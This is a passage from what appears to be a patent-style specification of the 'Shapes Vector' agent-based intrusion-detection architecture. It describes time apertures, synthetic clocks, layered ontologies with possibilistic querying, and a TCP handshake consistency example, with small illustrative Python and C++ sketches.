While we are aware that we can implement apertures in order to supply us with useful deductions for a number of circumstances, it is still an open question how to achieve an optimal set of sweep strategies for a very broad class of deductions with high confidence that we obtain what we are scanning for. One area which comes to mind is the natural “tension” between desired aperture settings. For example, an aperture setting of 180 degrees (ie. the whole fact space) is desirable as this considers all data possible in the stream, from the beginning of the epoch of capture to the end of time, or rather the last data captured. However, this setting is impractical from an implementation point of view, as well as introducing potential contradictions in the deductive process. On the other hand, a very small aperture is desirable in that implementation is easy along with fast processing, but can result in critical packets not being included in the processing scan.
Initial testing of an agent which understands portions of the HTTP protocol has yielded anecdotal evidence that there may be optimum aperture settings for specific domains of discourse. HTTP protocol data from a large (5 GB) corpus were analysed for a large network. It was shown that an aperture setting of 64 packets produced the largest set of deductions for the smallest aperture setting while avoiding the introduction of contradictions.
The optimal aperture setting is of course affected by the data input, as well as the domain of discourse. However, if we determine that our corpus is representative of expected traffic, then a default optimal aperture setting is possible for an agent. This aperture setting need only then be adjusted as required in the presence of contradicting deductions or for special processing purposes.
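A minimal sketch of the sweep idea follows; the aperture and step sizes, and the agent's deduction callable, are stand-ins rather than the actual Shapes Vector mechanism.

```python
# Minimal sketch of "sweeping" a fixed-size aperture along a packet stream.
# The deduction function and the packet list are hypothetical stand-ins; the
# 64-packet default echoes the empirically observed setting mentioned above.
def sweep_apertures(packets, aperture_size=64, step=32):
    """Yield overlapping windows of the stream for the agent to reason over."""
    for start in range(0, max(1, len(packets) - aperture_size + 1), step):
        yield packets[start:start + aperture_size]

def run_agent_over_stream(packets, deduce):
    """Collect the deductions produced over every aperture position."""
    deductions = set()
    for window in sweep_apertures(packets):
        # Each deduction is only valid relative to the window it was drawn from.
        deductions.update(deduce(window))
    return deductions
```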
5.2 Temporal Event Mapping for Agents
In the previous section, we discussed how an agent could have time apertures in order to process data streams. The issue of time is quite important, especially when considering that it takes a finite amount of time for a set of agents to arrive at a deduction and present a visualisation. Also, a user may wish to replay events at different speeds in order to see security relevant patterns. To provide such facilities in Shapes Vector, we introduce the notion of a synthetic clock. All entities in the system get their current time from the synthetic clock rather than the real system clock. A synthetic clock can be set arbitrarily to any current or past time, and its rate of change can also be specified.
A synthetic clock allows a user to run the system at different speeds and set its notion of time for analysing data. The synthetic clock also permits a variety of simulations to be performed under a number of semantic assumptions (see Section 7 of this part of the specification).
The above is all very well, but Shapes Vector may at the same time be utilised for current real-time network monitoring as well as running a simulation. In addition, the user may be interested in correlating past analysis conditions with current events and vice versa. For example, given a hypothesis from an ongoing analysis, the user may wish to specify that if a set of events occur in specific real-time windows based on past event temporal attributes or as part of an ongoing simulation, then an alarm should be given and the results or specific attributes can flow bi-directionally between the past event analysis and the current event condition. Hence Shapes Vector should be able to supply multiple synthetic clocks and the agent instances running according to each clock must be distinguishable from each other. All synthetic clocks are contained in the Tardis that is discussed in detail in Part 5 of this specification.
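A minimal sketch of a synthetic clock of this kind is given below; the class and its fields are assumptions for illustration, not the Tardis' actual clock interface.

```python
import time

# Minimal sketch of a synthetic clock: it can be anchored at an arbitrary past
# moment and run at an arbitrary rate. Multiple instances can coexist (one per
# analysis or simulation), as required by the Tardis.
class SyntheticClock:
    def __init__(self, start_epoch, rate=1.0):
        self._start_epoch = start_epoch   # synthetic time at creation
        self._rate = rate                 # synthetic seconds per real second
        self._anchor = time.time()        # real time at creation

    def now(self):
        """Return the current synthetic time."""
        elapsed_real = time.time() - self._anchor
        return self._start_epoch + elapsed_real * self._rate

# A replay clock running yesterday's data at four times real speed, alongside a
# live clock for current monitoring.
replay = SyntheticClock(start_epoch=time.time() - 86400, rate=4.0)
live = SyntheticClock(start_epoch=time.time(), rate=1.0)
```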
6. Implications for Higher Level Agents
The criterion that all agents must be context free is, in fact, not fully achievable. There are a number of influencing factors, but chief amongst these is time. An agent judged to be context free one year may not be context free later in its lifecycle, despite no change to its content. For example, consider a simple agent responsible for analysing the headers of web traffic (HTTP) to determine which requests went via a proxy server. At the time such an agent is written it may be context free (or more precisely its context is the universally accepted rules of HTTP transactions). However, future changes to the HTTP protocol or to the common practices used by web browsers or servers may cause it to become context sensitive despite no changes to the agent itself. That is, all deductions produced by the agent become true only in the context of “how HTTP worked at the time the agent was written”.
The above tends to encourage all agents to hold only one simple or “atom” deduction. This then ensures context freedom over a very long period of time. However, there are at least a couple of practical difficulties to such an approach:
• 1. A definition of what constitutes an atom deduction that is valid for all of the architecture must be determined;
• 2. A very sophisticated criterion for placement of agents within the agent hierarchy is needed, to the extent that a complete metalogic of semantics right across the agent architecture would be required (practically impossible).
7. Higher Level Ontologies
Detail of how the ontologies contribute to the functioning of the Agent architecture is disclosed in this section. In particular, the focus is on the ontologies above level 1, with a brief discussion of the two lowest levels.
7.1 Level 2
In developing the level 2 ontology, it became apparent that attempting the same approach as for level 1 would not work. Level 1 focuses very much on “concrete” objects (e.g. modems, computers) and deterministic concrete relationships (e.g. connection) in the form of a traditional first order logic. Adopting a similar approach for level 2 proved difficult in the light of the desirable criteria for higher level ontologies, namely that they should:
• Seek to embody a higher level of abstraction (relative to the previous, lower, level ontologies).
• Seek description in terms of “atomic” relationships for each abstraction level, from which more complex relationships can be built.
• Offer opportunities for fusion activities which cannot be handled at lower layers (since they would be context sensitive).
Given the above criteria, the identification of a set of orthogonal, higher-level object types or classes on which to base a context-free level 2 ontology was problematic. A more promising constructive methodology for level 2 was to focus less on objects in and of themselves (as the level 1 ontology had done) and instead to identify a set of fundamental operations and relationships. That is, to move towards a description in terms of higher-level logics.
The chosen approach for constructing the level 2 ontology was to consider the types of knowledge-based relations and operators an agent operating at level 2 would require to support Shapes Vector's security mission. Such agents would necessarily need to conduct semantic manipulations of basic objects and concepts embodied in level 1. Operators that remain generic (like those in level 1) were preferred over security-specific semantics. The key operators and relations present within the ontology are:
7.1.1 Relationships
These relationships may appear in both ontological statements (assertions) and also as clauses in ontological queries.
• Simple Set Theoretic Operators. A suite of common set-based relationships are incorporated, including set membership (Member_of), set intersection (Intersection_of), set union (Union_of), and Cartesian_product_of. These relationships provide the traditional basis for constructing more complex semantic relationships. Using such relationships we can, for example, express that computer “dialup.foo.net.au” is a member of the set of computers that have sent suspicious mail messages to server “www.bar.com” in the past day.
• Consistency Operators: Consistent_with, Inconsistent_with. The use of these relationships takes the form “X consistent_with Y” or “X inconsistent_with Y”. Since we are at a higher level, it is clear that contradictions will become apparent which are either invisible to the lower level agents, or as a result of their aperture settings, caused by a temporal context sensitivity. For example, we can use the operator to express the fact that a conclusion made by an e-mail agent that an e-mail originated at “nospam.com” is inconsistent with another observation made by a different agent that web traffic from the same machine reports its name as “dialup.foo.net.au”.
It is important to distinguish between this relationship and the traditional logical implies. We cannot construct a practical implementation of implies in our system. There are several well-known difficulties such as an implementation of a safe form of the “not” operator. Hence we have avoided the issue by providing a more restricted operator with a specific semantic which nevertheless serves our purposes for a class of problems.
• Based_on. The above Consistent_with and Inconsistent_with relationships are not sufficient for expressing practical semantics of consistency in Shapes Vector. Given the broad ranging domains of lower level agents, these relationships beg the question “consistent (or inconsistent) under what basis?”. Hence the Based_on clause, which is used in the following manner: “X Consistent_with Y Based_on Z”. The rules of such a logic may be derived from human expert knowledge, or may be automatically generated by a computational technique able to draw consistency relationships from a corpus of data. Here, Z represents consistency logic relevant to the particular context. An implication is that a simple form of type matching is advisable in order to prevent useless consistency logics being applied to elements being matched for consistency. The type matching can be constructed by utilising the set theory operators.
• Predicated Existential Operator: Is_Sufficient_for. This relationship takes the form “X is_sufficient_for Y” and encapsulates the semantics that Y would be true if X could be established. That is, it is used to introduce a conditional assertion of X predicated on Y. This facility could be used, for example, to report that it would be conclusively shown that computer “dialup.foo.net.au” was a web server IF it were observed that “dialup.foo.net.au” had sent HTML traffic on port 80.
• Possiblistic Existential Operator: Possible (X). This relationship serves to denote that the fact contained within its parentheses has been deemed to be a definite possibility. That is, the generator of the statement has stated that while it may not be able to conclusively deduce the existence of the fact, it has been able to identify it as a possibility. This relationship is necessary in order to be able to handle negation and the various forms of possibility. Further discussion appears below. Any fact expressible in the level 1 or level 2 ontology may be placed within a Possible statement. The most typical use of this operator would be in a response to a possiblistic query (see below). Note that the possibility relation does not appear as an operator in a query.
7.1.2 Interrogative Operators
The above relationships (except for Possible) also appear as operators in queries made to the Agent Gestalt at level two. However, there are a number of operators which do not have a corresponding relation in the ontology. These are now discussed:
• the usual boolean operators which can also be expressed in terms of set theory are supplied.
• asserting (Y). This unary operator allows us to ask whether the proposition X is true if we assume Y is a given (ie. whether X can be established through the temporary injection of fact Y into the universe). Y may or may not be relevant in deciding the truth of X hence the operator is in stark contrast to the Is_Sufficient_For relation where the truth of Y directly implies the truth of X. There are some interesting complexities to implementing the asserting operator in a Prolog environment. The assertion must take place in a manner such that it can override a contrary fact. For most implementations, this means ensuring that it is at the head of any identical clauses. One of the implementation methods is to first work out whether Y is true in the first place and if not, place in a term with a different arity and direct the query to the new term in order to bypass the other search paths.
• Is_it_possible. This operator allows for possiblistic queries. It takes the form “Is_it_possible X” where X may be any level 1 or level 2 ontological construct. Specifically, ontological relationships may be used, e.g., “Is_it_possible X [relationship (e.g. Member_of)] Y”. Is_it_possible can be used in conjunction with the asserting operator (e.g. Is_it_possible X [operator] Y asserting Z) to perform a possiblistic query where one or more facts are temporarily injected into the universe. Using this operator we can, for example, issue a query asking whether it is possible that computer “dialup.foobar.net.au” is a web server. Furthermore we could ask whether, based on an assumption that computer “dialup.foo.net.au” is connected via a modem, the computer makes use of a web proxy. Is_it_possible provides a means for returning results from predicates as ground facts rather than insisting that all queries resolve to an evaluated proposition (see Section 3.2 of this part). The evaluation result of a query of this nature is either no or maybe: maybe if the fact is possible or if no condition is found which bars it, and no if a condition can be found in the universe preventing its possibility.
• Is_it_definitely_possible. This operator is not orthogonal to the previous one. The evaluation result is either yes or no. The difference between this operator and the previous one is that for it to return true, there must be a set of conditions in the universe which permit the result to be true, and the possibility relation exists.
• Under_what_circumstances. This operator provides for a reverse style of possiblistic querying in which a target fact is given and the queried entity is called upon to provide the list of all conditions that would need to hold true for that fact to be established. For example we can ask under what conditions would it be conclusively true that a guest user had remotely logged into the computer “dialup.foobar.net.au”.
• Not is one of the more interesting operators. There has been much discussion over the years on how to implement the equivalent of logical negation. The problems in doing so are classic and no general solution is disclosed. Rather, three strategies are generated that provide an implementation approach which satisfies our requirement for a logical negation operator. For the Shapes Vector system, any Not operator is transformed into a possiblistic query utilising negation as failure. Not (X) is transformed to the negation of Is_it_possible (X), where the negation operation maps ‘no’ to ‘yes’ and ‘maybe’ to ‘maybe’. Doing so requires us to have the user make an interpretation of the result based on fixed criteria. However, it is claimed that such an interpretation is simple. For example: a user may inquire as to whether it is “not true that X is connected to Y”. This would be transformed into a query as to whether it was possible that X is connected to Y and the result of that second query negated. If the system determined that it might be possible that X is connected to Y, the final response would be that it might be possible that it is “not true that X is connected to Y.” Alternatively, if it could be established that the connection was not possible, the final response would be yes, it is “not true that X is connected to Y.”
The above possibility operators cause some interesting implementation issues. It needs to be possible to detect the reason why a query fails, ie. did it fail due to a condition contradicting success (hard fail), or simply because all goals were exhausted in trying to find a match (soft fail)? As a partial solution to this issue, we must add to the criteria for constructing an agent. A further criterion is that an agent's clauses are constructed in two sets: a case for the positive, and a case for the negative. We attempt to state the negative aspects explicitly. These negative clauses, if unified, cause a hard fail to be registered. It is fairly simple to deduce here that we cannot guarantee completeness of an agent across its domain of discourse. However, a soft fail interpretation due to incompleteness on the part of the agent remains semantically consistent with the logic and the response to the user.
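The two-clause-set convention and the resulting hard/soft fail behaviour can be sketched as follows; the rule representation and the yes/no/maybe encoding are assumptions made for the example rather than the Prolog implementation described above.

```python
# Minimal sketch of the "two clause sets" convention: each agent keeps an explicit
# set of negative clauses; unifying against these registers a hard fail, while
# exhausting both sets without a match is a soft fail. Names are hypothetical.
YES, NO, MAYBE = "yes", "no", "maybe"

class PossiblisticAgent:
    def __init__(self, positive_rules, negative_rules):
        self.positive_rules = positive_rules   # callables: facts -> bool (prove the goal)
        self.negative_rules = negative_rules   # callables: facts -> bool (preclude the goal)

    def is_it_possible(self, facts):
        if any(rule(facts) for rule in self.negative_rules):
            return NO        # hard fail: an explicit contradicting condition unified
        if any(rule(facts) for rule in self.positive_rules):
            return MAYBE     # provable, but this operator only ever answers maybe/no
        return MAYBE         # soft fail: goals exhausted, nothing precludes the goal

    def not_query(self, facts):
        """Not(X) is transformed into the negation of Is_it_possible(X)."""
        return {NO: YES, MAYBE: MAYBE}[self.is_it_possible(facts)]
```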
7.2 Level 3 and Above
As can be seen, the main characteristics of level 2 when compared to level 1 are the inclusion of possibilistic reasoning and the introduction of the ability to define semantics for consistency. If we carry this abstraction path (ie. first order logic to possibilistic logic) one step further we can surmise that the next fundamental step should be an ontology which deals with probabilistic logic. For example, semantics to support operators such as “likely”.
Initial operators designated for level three include “is it likely”, which has a set of qualifiers in order to define what “likely” means. Interpretation based on specific user profiles will be needed; hence user Avatars (see the next section in this portion of the specification) are present in order to help interpret abstract user queries into precise, complex ontology. It is suggested that any levels beyond this become much more mission specific and will begin to include security specific relationships.
In actual fact, the labelled levels “2” and “3” may not actually be located consecutively at the second and third layers of the agent hierarchy. Due to the need for avoiding context sensitivity within a level when introducing new agents, there will always be a need to introduce intermediate levels in order to cater for fusers in a way that does not necessitate the expansion of the adjacent levels' ontologies. Hence we refer here to the labels “level 2” and “level 3” as ontological delineators. Indeed, current expectations are that the possibilistic reasoning parts of an ontology will be introduced around level six due to fusing agents which are to be introduced for Shapes Vector's security mission.
7.3 An Example of Possiblistic Querying
Consider a simple IA/fuser designed to accept input from two knowledge sources—one describing network hosts and the ports they listen on, and another describing local file system accesses on a network host. By fusing such inputs, the agent deduces situations where security has been compromised.
Such an agent may contain the following rules, specified here in pseudo-English. In reality, the deductive rules within such an agent would be considerably more complex and would involve many additional factors; they are simplified here for illustrative purposes (an executable sketch of these rules follows the worked queries below):
• 1. If a process Y listens on port P AND P is NOT a recognised port <1024 THEN Y is a “non-system daemon”.
• 2. If a process Y is a non-system daemon AND Y wrote to system file F THEN Y “corrupted” F.
Consider the situation where, in analysing the data for a time window, the agent receives the following input:
• Process 1234 listens on port 21
• Process 3257 has written to /etc/passwd
• Process 1234 has written to /etc/passwd
• Process 3257 listens on port 31337
• Process 987 listens on port 1022
• Port 21 is a recognised port
The following possiblistic queries may be issued to the agent:
Is_it_possible Process 1234 corrupted /etc/passwd?
In this case, the agent would generate a Hard Fail (i.e. a “definite no”) since a contradiction is encountered. The relationship “corrupted” can only be true if Rule 1 has classified Process 1234 as a “non-system daemon”, but that can only happen if Port 21 is not “recognised”. This last fact is explicitly contradicted by the available facts.
Is_it_possible Process 987 corrupted /etc/passwd?
In this case, the agent would generate a Soft Fail (i.e., a “maybe”) since, while no contradiction is present, neither is there sufficient evidence to conclusively show Process 987 has corrupted /etc/passwd. Rule 1 can classify Process 987 as a non-system daemon, but there are no observations showing that Process 987 wrote to /etc/passwd (which does not, in itself, mean that it did not, given the agent's inherently incomplete view of the world).
Under_what_circumstances could Process 987 have corrupted /etc/passwd?
In this case the agent would respond with the fact “Process 987 has written to /etc/passwd”, which is the missing fact required to show that the process corrupted /etc/passwd.
Is_it_possible Process 3257 corrupted /etc/passwd?
Not only is it possible that Process 3257 could have corrupted the file, there is sufficient evidence to show that it definitely occurred. That is, under normal predicate logic the rules would deduce the “corrupted” relationship. However, since the Is_It_Possible operator replies either “no” or “maybe”, the agent in this case replies “maybe”.
Can you show that Process 3257 corrupted /etc/passwd?
This is a straight predicate (i.e., non-possiblistic) query. Since the facts support a successful resolution under the Rules 1 and 2, the agent replies “yes”.
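The worked example above can be rendered as the following executable sketch; the fact encoding and rule functions are our own illustrative translation of the pseudo-English rules, not the agent's actual logic-language clauses.

```python
# Executable sketch of the example above. The encoding of rules and facts is ours;
# the real agent would express these in its logic language, not Python.
FACTS = {
    ("listens-on", 1234, 21),
    ("wrote-to", 3257, "/etc/passwd"),
    ("wrote-to", 1234, "/etc/passwd"),
    ("listens-on", 3257, 31337),
    ("listens-on", 987, 1022),
}
RECOGNISED_PORTS = {21}

def non_system_daemon(proc):
    """Rule 1: the process listens on a port that is NOT a recognised port below 1024."""
    ports = [p for (rel, pr, p) in FACTS if rel == "listens-on" and pr == proc]
    if not ports:
        return "maybe"   # no listening fact observed at all
    if all(p in RECOGNISED_PORTS and p < 1024 for p in ports):
        return "no"      # hard fail: every observed port is explicitly recognised
    return "yes"

def corrupted(proc, target="/etc/passwd"):
    """Rule 2: a non-system daemon that wrote to a system file corrupted it."""
    daemon = non_system_daemon(proc)
    if daemon == "no":
        return "no"      # hard fail propagates (contradicting condition found)
    wrote = ("wrote-to", proc, target) in FACTS
    if daemon == "yes" and wrote:
        return "yes"     # conclusively shown under straight predicate logic
    return "maybe"       # soft fail: no contradiction, but evidence is missing

# Note: the Is_It_Possible operator would report the "yes" case below as "maybe",
# since it only ever answers no/maybe; "yes" corresponds to the straight predicate query.
print(corrupted(1234))   # "no"    - hard fail (port 21 is a recognised port)
print(corrupted(987))    # "maybe" - soft fail (no write to /etc/passwd observed)
print(corrupted(3257))   # "yes"   - the predicate query succeeds
```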
7.4 An Example of the Use of Consistency
In this section, we describe a simple example showing the utility of the consistency logic for a security application.
Consider the case of a simple consistency agent, which understands the basics of the TCP protocol, and in particular is aware of the traditional “three-way handshake” involved in the establishment of a TCP connection. This agent would be able to recognise valid handshakes and report the consistency of the packet sequences they comprise. Consider the following input to such an agent:
• Packet L1 (type=“TCP SYN”)
• Packet L2 (type=“TCP SYN ACK”)
• L2 directly-follows L1
• Packet L3 (Type=“TCP ACK”)
• L3 directly-follows L2
For this input, the agent will recognise the validity of this handshake and be able to report consistency of the packet sequences by stating:
• (L2 directly-follows L1) Consistent_with (L3 directly-follows L2) Based_on “TCP Handshake (Packet L1 (type=“TCP SYN”), Packet L2 (type=“TCP SYN ACK”), Packet L3 (Type=“TCP ACK”))”
Alternatively, the same agent could be presented with an invalid handshake as input, for example:
• Packet X1 (type=“TCP SYN”)
• Packet X2 (type=“TCP SYN ACK”)
• X2 directly-follows X1
• Packet X3 (Type=“TCP RST”)
• X3 directly-follows X2
In this case the agent would recognise that it is invalid for a TCP implementation to complete two parts of the handshake and then spontaneously issue a Reset packet. It would represent this inconsistency by reporting:
• (X2 directly-follows X1) Inconsistent_with (X3 directly-follows X2) Based_on “TCP Handshake (Packet X1 (type=“TCP SYN”), Packet X2 (type=“TCP SYN ACK”), Packet X3 (Type=“TCP RST”))”
Such a statement of inconsistency may be directly interrogated by a user interested in anomalous traffic, or alternatively passed as input to a set of security-specific agents, which would correlate the observation with other input.
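A minimal sketch of such a handshake consistency check follows; the packet representation and the format of the Based_on string are illustrative assumptions rather than the agent's actual ontology output.

```python
# Minimal sketch of the handshake consistency check above. The packet encoding
# and the rendered Based_on string are illustrative only.
VALID_HANDSHAKE = ("TCP SYN", "TCP SYN ACK", "TCP ACK")

def check_handshake(packets):
    """packets: an ordered list of exactly three (packet_id, packet_type) tuples."""
    (id1, _), (id2, _), (id3, _) = packets
    types = tuple(ptype for _, ptype in packets)
    relation = "Consistent_with" if types == VALID_HANDSHAKE else "Inconsistent_with"
    basis = "TCP Handshake " + ", ".join(f"{pid} (type={ptype})" for pid, ptype in packets)
    return (f"({id2} directly-follows {id1}) {relation} "
            f"({id3} directly-follows {id2}) Based_on \"{basis}\"")

# The valid and invalid sequences from the example above.
print(check_handshake([("L1", "TCP SYN"), ("L2", "TCP SYN ACK"), ("L3", "TCP ACK")]))
print(check_handshake([("X1", "TCP SYN"), ("X2", "TCP SYN ACK"), ("X3", "TCP RST")]))
```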
An interesting implementation issue arises when we consider the construction of consistency assertions. The number of assertions needed to describe consistency, e.g. for TCP/IP traffic, may be very large or dependent on specific environments, and could be data driven. There is a surprisingly simple possibility for the automatic generation of consistency assertion sets. Very preliminary investigation has indicated that data mining methods applied to a designated standard data corpus are well suited to generating assertion sets, which may then be used as the consistency logic. Data mining is extensively used in detecting variances in traffic, but has been less successful in detecting intrusions. However, data mining has been shown to be very successful in characterising data, and is thus an exciting possibility for use in the Shapes Vector system for describing bases of consistency.
8. User Avatars
It is necessary to have an intelligent interface so that the user may interact with the agents as a Gestalt. Accordingly, a set of user avatars is constructed. These avatars preferably contain a level of intelligent processing as well as the usual query parsing (provided, in one example, by commercial voice recognition packages). In order to maintain consistency, user avatars are apparent at all levels in the ontologies. This permits each avatar to be able to converse with the agents at its level, while still permitting control and communication methods with avatars above and below. Put simply, the same reasons for developing the agent hierarchy are applied to the avatar set. Given the nature of an avatar, it may be argued by some that there is little difference between an agent in the Gestalt and the avatar itself. Avatars and Gestalt agents are distinguished by the following characteristics:
• Agents deal with other agents and Avatars.
• Avatars deal with agents and users.
• Avatars can translate user queries into precise ontology based on specific user driven adaptive processes to resolve context.
• Further to the above, Avatars store user profiles in a manner so as to interpret different connotations based on specific user idiosyncrasies. For example, the use of the probabilistic logic based queries where the term likely can be weighted differently according to each user.
One of the activities expected of Avatars in the Shapes Vector system is to modify queries so that they may be made more precise before presentation to the Gestalt. For example, at a high layer of abstraction, a user may initiate the query “I have observed X and Y, am I being attacked?”. An Avatar, given a user profile, may modify this query to “Given observations X, Y, based on Z, is it likely that a known attack path exists within this statistical profile”.
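A minimal sketch of this profile-driven refinement is given below; the user profiles, thresholds and the refined query template are assumptions made for illustration only.

```python
# Minimal sketch of an avatar refining a vague user query using a stored profile.
# The profile fields and query grammar are illustrative, not the system's own.
USER_PROFILES = {
    "analyst-1": {"likely_threshold": 0.7, "basis": "known attack-path statistics"},
    "analyst-2": {"likely_threshold": 0.5, "basis": "local network baseline"},
}

def refine_query(user, observations):
    """Rewrite a high-level user question into a more precise Gestalt query."""
    profile = USER_PROFILES[user]
    return (f"Given observations {', '.join(observations)}, based on {profile['basis']}, "
            f"is it likely (weight >= {profile['likely_threshold']}) that a known attack "
            f"path exists within this statistical profile?")

# "I have observed X and Y, am I being attacked?" becomes:
print(refine_query("analyst-1", ["X", "Y"]))
```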
9. Further Comments on the Architecture
The hierarchical layering of the architecture with interleaved ontologies provides a strong advantage to Shapes Vector. Each ontology provides a filtering process for the deductions and knowledge transfer between levels. This helps “stabilise” and reduce context sensitivity. It also permits a strong method for checking the validity of component construction. However, a price is paid: the filtering between layers implies that the potential of each agent to contribute to the Gestalt is constrained. A particular agent may be able to undertake a variety of relevant deductions but these may be “strained” or “filtered” as the agent passes its knowledge through an ontology layer. Hence the theoretical full potential of the Gestalt is never actually realisable.
In order to overcome the above constraint in a sensible, practical and useful manner, it is necessary to review the ontology layers continuously, in search of new relationships and objects to bring into “first class” status so that they may become part of the ontology itself. That is, lessen the filtering process in a controlled manner. To do so, however, requires much thought since an incorrect change in an ontology level can wreak havoc with the Gestalt operation. Of course it is possible to pass richer knowledge statements by using attributes through the ontology layers. However, it becomes the user's responsibility to ensure that the receiving agents can make sense of the additional attributes.
10.1 AAFID
Researchers at Purdue University have designed and implemented an agent-based architecture for Intrusion Detection, called AAFID (Autonomous Agents for Intrusion Detection) [Spafford, E. and Zamboni, D., “Intrusion detection using autonomous agents”, Computer Networks, vol. 34, pp. 547-570, 2000]. This architecture is based around a fundamental paradigm of distributed computation. One or more software agents run on each protected host of a network, communicating any events of interest to a single “Transceiver” running on the host. This component can perform some host-level fusion of alerts, but principally exists to forward significant observations to a “Monitor” process, which has an even broader purview.
This architecture at first appears to have similarities to the approach described herein, in that it supports multiple autonomous entities (each with a particular field of expertise) arranged in a distributed structure with hierarchy-based filtering. The AAFID system, however, does not appear to have a concept of multiple abstraction layers—all agents, transceivers and monitors reason within a single universe of discourse which, apparently, contains both low-level and fairly high-level concepts. Furthermore, the operation of these various entities seems to focus purely on a data driven model; there is no obvious scope for users to set goals for components, nor to directly query the internal knowledge state of the system. AAFID's hierarchical structuring of agents seems limited to a single rooted tree, as opposed to our system's support for generalised directed acyclic graph structures. There is also no obvious scope for possiblistic or probabilistic reasoning within the AAFID architecture coupled with orthogonal semantic ontology layers.
10.2 Comparison with the Bass' Comments
The following discussion providing some background to the invention is intended to facilitate a better understanding of the invention. However, it should be appreciated that the discussion is not an acknowledgment or admission that any of the material referred to was published, known or part of the common general knowledge as at the priority date of the application.
In “Intrusion Detection Systems & Multisensor Fusion: Creating Cyberspace Situational Awareness”, Communications of the ACM 43(4), April 2000, Bass speculates on the future architecture requirements for Intrusion Detection Systems. In particular, he discusses the need for data abduction and points to the requirement for three main levels of semantic ascension.
The Shapes Vector architecture shows some necessary implementation strategies and architectural modifications in order to achieve that goal state. In particular, Shapes Vector views the concept ascension requirement as a continuum where at any point in the AI agent Gestalt one "sees" knowledge production on looking "up", and data supply on looking "down". The three main levels in the Shapes Vector Gestalt are delineated by the methods and logics used (ie. first order predicate, possibilistic and probabilistic), rather than by some delineation as to whether there is information, data, or knowledge as depicted in FIG. 13. Bass's requirements for a "discovery module etc" become less important in the Shapes Vector architecture as any such function is a pervasive part of the system and is distributed amongst more primitive functions. The Agent Gestalt feeds the visualisation engines rather than some specific event, though earlier papers do tend to indicate a separate module and as such those papers are a little misleading.
11. A Multi-Abstractional Framework for Shapes Vector Agents
The Shapes Vector Knowledge Architecture (SVKA) is intended to provide a framework, in which large numbers of Intelligent Agents may work collaboratively, populating layers of a highly ordered “Gestalt”. Previous definitions of the SVKA have focussed primarily on macro-aspects of the architecture, describing a system in which each layer of the Gestalt represents a distinct universe of discourse as described by the ontology associated with it.
Experience with building collaborative Intelligent Agent systems for Shapes Vector has highlighted the desirability of a more flexible model, one that allows for the subdivision of these “ontology layers” into a number of sub-layers. Each sub-layer in such a divided model shares a common universe of discourse (i.e., all reference a common ontology). Intelligent Agents can populate any of these various sub-layers, allowing for the construction of systems capable of very general forms of data fusion and co-ordination.
Furthermore, it is envisaged that future requirements on the SVKA will involve the necessity of maintaining several "parallel universes of discourse" (e.g., running a sub-Gestalt in the domain of Security in parallel with another sub-Gestalt in the domain of EM Security). Such parallel universes may have entry and exit points into one another (at which appropriate translations take place). They may furthermore share similar abstractional levels, or may even overlap the abstractional levels of multiple other universes.
In order to satisfy these two demands, the SVKA definition requires elaboration. In this part of the specification we undertake a redefinition of the architecture which expands it in a number of ways to meet these requirements. Key features are:
• The SVKA Gestalt is divided into an arbitrary number of Locales,
• A Universe of Discourse and an Instance Number identify each Locale,
• Each Locale contains a number of levels at which Intelligent Agents may reside.
• A Locale may optionally nominate a single entry point: a remote locale and a level within that locale, from which input data is received into the locale,
• A Locale may optionally nominate a single exit point: a remote locale and a level within that locale, to which output data is sent from the locale.
11.1 Concepts
The Shapes Vector Knowledge Architecture (SVKA) contains exactly one Shapes Vector Gestalt Framework (SVGF) or “Gestalt”. The Gestalt is an abstract entity in which groups of collaborating software agents may be placed.
The Shapes Vector Gestalt Framework contains an arbitrary number of Shapes Vector Gestalt Locales (SVGLs) or “Locales”. A Locale is an abstract entity in which hierarchies of collaborating software agents may be placed. The defining characteristic of a Locale is that it is intimately tied to exactly one Universe of Discourse (UoD). For each UoD there may be multiple Locales simultaneously active, thus to distinguish these we also tag each Locale with an instance ID. This is unique only within the context of all Locales tied to the same UoD. For example there can exist a Locale with UoD “Level 1 Cyber Ontology”, instance 0 simultaneous with a Locale with UoD “Level 2 Cyber Ontology”, instance 0. However two Locales with UoD “Level 1 Cyber Ontology” and instance 0 cannot co-exist.
Each Shapes Vector Gestalt Locale is divided into an arbitrary number of Shapes Vector Gestalt Locale Levels (SVGLLs) or “Levels”. A Level is an abstract entity in which a non-cooperating set of agents may be placed. Each Level has a unique Level Number within the Locale (a zero or positive real number); Levels are notionally ordered into a sequence by their Level Numbers.
In addition to a UoD and instance ID, each Locale also optionally possesses two additional attributes: an entry point and an exit point. Each refers to a Level of a remote Locale, that is each reference contains the UoD and instance number of a Locale not equal to this Locale, and also nominates a particular (existent) Layer within that Locale. The entry point of a Locale defines a source of data, which may be consumed by the agents at the lowest Level of this Locale. The exit point of a Locale defines a destination to which data generated by agents in the highest Level of this Locale may be sent.
It is specifically forbidden for Locales within the Gestalt to be at any time directly or indirectly arranged in a cycle via their entry and/or exit points. That is, it must be impossible to draw a path from any point in any Locale back to that same point utilising entries and exits between Locales.
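To make the Locale structure concrete, the following is a minimal C++ sketch of how a Locale and its optional entry and exit points might be represented. The type and field names are illustrative assumptions only and do not form part of the SVKA definition.

#include <optional>
#include <string>
#include <vector>

// Illustrative sketch only; names and types are assumptions, not SVKA code.
struct LocaleRef {
    std::string uod;       // Universe of Discourse of the remote Locale
    int         instance;  // instance ID of the remote Locale
    double      level;     // Level Number within that remote Locale
};

struct Locale {
    std::string uod;                      // Universe of Discourse this Locale is tied to
    int         instance;                 // unique only among Locales sharing the same UoD
    std::vector<double> levels;           // ordered Level Numbers at which agents may reside
    std::optional<LocaleRef> entryPoint;  // optional source of data for the lowest Level
    std::optional<LocaleRef> exitPoint;   // optional destination for data from the highest Level
};

Under such a representation, the prohibition on cycles amounts to requiring that the directed graph formed by treating entry and exit points as edges between Locales remains acyclic.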
A Shapes Vector Gestalt Locale, which is divided into n Levels, contains n−1 Shapes Vector Assertion Routers (SVARs) or "Assertion Routers". An Assertion Router is a concrete software entity which receives input from one set of agents, performs some semantic-based filtering, then forwards the relevant sub-sections on to each of a set of agents in a second (disjoint) set. Each Assertion Router has an associated Level Number unique within the Locale (a zero or positive real number); Assertion Routers are notionally ordered into a sequence by their Level Numbers. Furthermore, each Assertion Router has an Instance ID (a zero or positive integer) which is globally unique.
There is a one-to-one mapping between Locale Level Numbers and Assertion Router Level Numbers, defined by the following relationship. The Assertion Router with Level Number n receives input from agents positioned in Locale Level Number n and provides output to agents which are resident at the next Locale Level Number after n.
